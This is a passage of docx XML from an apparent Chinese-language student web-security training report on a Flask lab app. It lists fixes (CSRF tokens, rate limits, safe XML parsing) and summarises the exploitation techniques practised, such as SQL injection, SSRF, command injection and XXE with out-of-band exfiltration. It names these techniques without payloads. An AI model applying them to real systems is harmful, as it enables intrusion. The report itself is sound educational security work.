        <w:t>• CSRF Token 校验：所有 POST 表单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 速率限制：登录 10次/分钟 + 全局 50次/小时</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• UUID 重命名上传文件：文件覆盖防护</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 命令执行参数数组替代 shell=True：Ping 功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 安全 XML 解析器推荐：defusedxml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>6  实训总结与收获</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>6.1  技术收获</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>通过本次实训，深入理解了 Web 安全中"输入即攻击面"的核心原则。从 SQL 注入到 XXE，所有漏洞的本质都是将用户可控的数据传递到高风险解释器（SQL 引擎、操作系统 Shell、XML 解析器、文件系统路径等），而未做充分的边界校验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>实训中实践了多种漏洞利用技术：UNION 注入数据脱取、布尔盲注逐字符提取、联合文件上传与命令注入的权限提升链、SSRF 内网横向移动、XXE 文件读取与 OOB 数据外传等。这些技术让我对攻击链条有了更完整的认识。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>6.2  安全开发思维</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>从"先写功能再修安全"到"设计时即考虑安全"的思维转变是本次实训最大的收获。通过在 main 分支上实施迭代修复并追踪 Git 历史，深刻体会到：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 安全左移：在需求阶段就定义安全验收标准</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 纵深防御：单一防护手段不够，需要多层安全机制叠加</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 最小权限：运行进程、数据库账户、功能权限都应遵循最小化原则</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 默认安全：框架默认配置往往不安全，需要主动加固</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>• 可追溯性：Git 提交 + 漏洞报告形成完整的证据链</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>6.3  工具与方法论</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>掌握了从浏览器开发者工具到 Burp Suite 再到 curl 命令行的分层测试方法。学会了使用 python-docx 批量生成规范化安全报告，使用 Git 分支管理漏洞版与修复版代码的对比。方法论上建立了"场景搭建 → 漏洞复现 → 原因分析 → 修复加固 → 回归验证"的闭环流程，这套流程可复用于未来任何 Web 项目的安全评估。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>6.4  未来展望</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本次实训覆盖了 OWASP Top 10 中的大部分 Web 漏洞类型，但仍有改进空间：可进一步扩展的方面包括自动化安全测试集成（SAST/DAST）、持续安全监控、容器化部署安全、API 安全等方面的实践。希望将本次实训的经验应用到未来的开发工作中，建立更完善的安全开发生命周期。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="999999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66666"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>— 报告完 —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GitHub: https://github.com/limeee-eng/flask.app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